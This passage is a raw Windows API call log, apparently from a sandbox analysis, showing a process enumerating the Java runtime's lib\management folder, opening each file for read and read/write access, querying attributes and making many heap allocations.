lpWideCharStr=0x8d2c8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 78 [0097.549] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.550] GetFileType (hFile=0x418) returned 0x1 [0097.550] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0097.550] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.550] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.550] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.550] CloseHandle (hObject=0x418) returned 1 [0097.550] AreFileApisANSI () returned 1 [0097.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.550] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c5a8 [0097.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 78 [0097.551] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.551] GetFileType (hFile=0x418) returned 0x1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0097.551] CloseHandle (hObject=0x418) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.551] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.551] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.552] AreFileApisANSI () returned 1 [0097.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.552] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c998 [0097.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 78 [0097.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb28)) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.552] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3926, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="management.properties", cAlternateFileName="MANAGE~1.PRO")) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.553] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a790 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0097.553] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.553] AreFileApisANSI () returned 1 [0097.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties", lpUsedDefaultChar=0x0) returned 72 [0097.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0097.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.554] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.554] AreFileApisANSI () returned 1 [0097.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0097.554] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0097.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a400, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 72 [0097.554] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.554] GetFileType (hFile=0x418) returned 0x1 [0097.554] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0097.554] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.554] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.555] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.555] CloseHandle (hObject=0x418) returned 1 [0097.555] AreFileApisANSI () returned 1 [0097.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0097.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0097.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 72 [0097.555] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.555] GetFileType (hFile=0x418) returned 0x1 [0097.555] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0097.555] CloseHandle (hObject=0x418) returned 1 [0097.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.555] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.556] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.556] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.557] AreFileApisANSI () returned 1 [0097.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0097.557] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties") returned 72 [0097.557] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\management.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\management.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3926)) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0097.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.557] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.557] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.557] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.557] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 